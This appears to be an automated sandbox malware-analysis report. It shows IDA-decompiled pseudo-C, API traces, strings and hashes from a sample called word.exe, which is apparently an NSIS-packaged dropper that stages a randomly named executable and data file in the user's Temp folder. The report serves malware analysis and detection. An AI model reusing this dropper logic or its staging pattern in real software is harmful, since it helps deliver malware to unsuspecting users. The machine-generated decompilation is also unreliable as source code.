.DEFAULT\Control Panel\International, xrefs: 00403D83

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2235648170
Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(0x436800, L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe");
				E00406668(0x439000, E00405F83(0x436800));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}

0x004030db
0x004030de
0x004030e1
0x004030fb
0x00403100
0x00403113
0x00403118
0x0040311e
0x00000000
0x00403120
0x00403131
0x00403142
0x00403149
0x00403151
0x00403156
0x00403158
0x00403243
0x00403245
0x00403251
0x00000000
0x00000000
0x0040325a
0x00403286
0x0040328b
0x00403296
0x00403298
0x004032a9
0x004032c4
0x004032cd
0x004032d2
0x004032f1
0x00403301
0x00403313
0x00403318
0x00403320
0x0040332d
0x00403335
0x0040333a
0x0040333c
0x0040333c
0x00403344
0x00403344
0x00403347
0x00403348
0x00403348
0x0040334b
0x0040334d
0x0040334d
0x00403357
0x00403363
0x00000000
0x00403368
0x00000000
0x00403320
0x00000000
0x004032d4
0x00403262
0x00403274
0x00000000
0x00000000
0x00000000
0x00000000
0x0040315e
0x00403163
0x00403168
0x0040316c
0x00403173
0x0040317a
0x0040317c
0x0040317c
0x00403187
0x004032e0
0x00403322
0x00000000
0x00403322
0x00403194
0x00403214
0x00403218
0x0040321d
0x00000000
0x00403214
0x0040319d
0x004031a2
0x004031aa
0x004031d0
0x004031df
0x004031e5
0x004031ea
0x004031f0
0x00000000
0x00000000
0x004031fa
0x00403202
0x00403205
0x0040320a
0x0040320c
0x0040320c
0x00000000
0x00000000
0x00000000
0x00000000
0x004031fa
0x0040321e
0x00403224
0x00403230
0x00403230
0x00403233
0x00403239
0x00403239
0x00403241
0x00000000
0x00403241

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000400), ref: 00403100

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00403149
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B

Strings

C:\Users\user\AppData\Roaming\word.exe, xrefs: 004030EA, 004030F9, 0040310D, 0040312A
Null, xrefs: 004031C7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
Error launching installer, xrefs: 00403120
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 004032A3
soft, xrefs: 004031BE
Inst, xrefs: 004031B5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-565166287
Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32 ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00000000,00000000,"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401835, 00401851
"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v$C:\Users\user\AppData\Local\Temp
API String ID: 1941528284-1028890237
Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

Uniqueness

Uniqueness Score: -1.00%

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004069dc
0x004069e5
0x004069e7
0x004069e7
0x004069eb
0x004069fe
0x004069f8
0x004069f8
0x004069f8
0x00406a17
0x00406a2b
0x00406a32

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
wsprintfW.USER32 ref: 00406A17
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Strings

UXTHEME, xrefs: 004069CE
%s%S.dll, xrefs: 00406A11
\, xrefs: 004069ED

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405ba4
0x00405ba8
0x00405bab
0x00405bb1
0x00405bb5
0x00405bb9
0x00405bc1
0x00405bc8
0x00405bce
0x00405bd5
0x00405bdc
0x00405be4
0x00405be6
0x00000000
0x00405be6
0x00405bf0
0x00405bf7
0x00405c0d
0x00000000
0x00000000
0x00000000
0x00405c0f
0x00405c13

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
GetLastError.KERNEL32 ref: 00405BF0
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
GetLastError.KERNEL32 ref: 00405C0F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-4017390910
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040618d
0x00406193
0x00406194
0x00406194
0x00406199
0x0040619a
0x0040619d
0x004061a2
0x004061a5
0x004061af
0x004061bc
0x004061c0
0x004061c8
0x00000000
0x00000000
0x004061cc
0x00000000
0x004061ce
0x004061ce
0x004061ce
0x004061d1
0x004061d4
0x004061d4
0x004061d7
0x00000000

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061A5
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040618C
nsa, xrefs: 00406194

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-4262883142
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
